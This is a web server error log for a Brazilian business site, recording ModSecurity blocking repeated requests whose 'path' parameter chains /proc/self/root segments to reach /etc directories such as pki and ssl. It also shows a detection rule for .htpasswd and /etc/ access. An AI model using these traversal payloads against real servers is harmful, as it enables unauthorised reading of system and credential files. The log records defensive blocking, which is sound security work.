[Fri Mar 20 03:49:41.911444 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.241.31:56404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuBfHIg5MgXLBnicPMIAAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:42.226612 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:39714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuBhCii7xarUs8iHY0oQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:43.548351 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:39718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuB9a6ubjKNq_cu4afIQAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:44.267982 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:53002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuCOoXxyEfFpUF8f9UQAAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:44.863386 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.243.128:39734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuCLninkcc-iUj5AouTQAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:46.210295 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.243.128:39748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuCvHIg5MgXLBnicPMKAAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:47.455152 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.243.128:39762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuC7ninkcc-iUj5AouUQAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:48.753603 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:39776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuDDJ3M9BSuKP7CAbgyAAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:50.051222 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:44732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuDjJ3M9BSuKP7CAbgzQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:51.400201 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:44742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuD-oXxyEfFpUF8f9URwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:52.681551 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:44748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuENa6ubjKNq_cu4afMAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:53.887718 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:44764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuEda6ubjKNq_cu4afMQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:55.182089 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:44780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuE-oXxyEfFpUF8f9UVwAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:56.467782 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:44796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuFPqxLDW4GITHUkSykAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:57.805789 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.243.128:44802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuFTJ3M9BSuKP7CAbg1AAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:57.903593 2026] [mime_magic:error] [pid 11167:tid 140411691570944] (70014)End of file found: [client 57.141.18.101:53260] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:49:59.026991 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.243.128:44816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuFzJ3M9BSuKP7CAbg1QAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:00.339280 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:50694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuGNa6ubjKNq_cu4afNwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:00.499540 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:53012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuGOoXxyEfFpUF8f9UZQAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:50:03.492440 2026] [:error] [pid 31215:tid 140411607643904] [client 74.7.243.128:50708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuGQF0L0L-SsrnPo445wAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:05.788134 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:50724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuHfqxLDW4GITHUkSylQAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:05.985502 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:50724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuHfqxLDW4GITHUkSylgAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
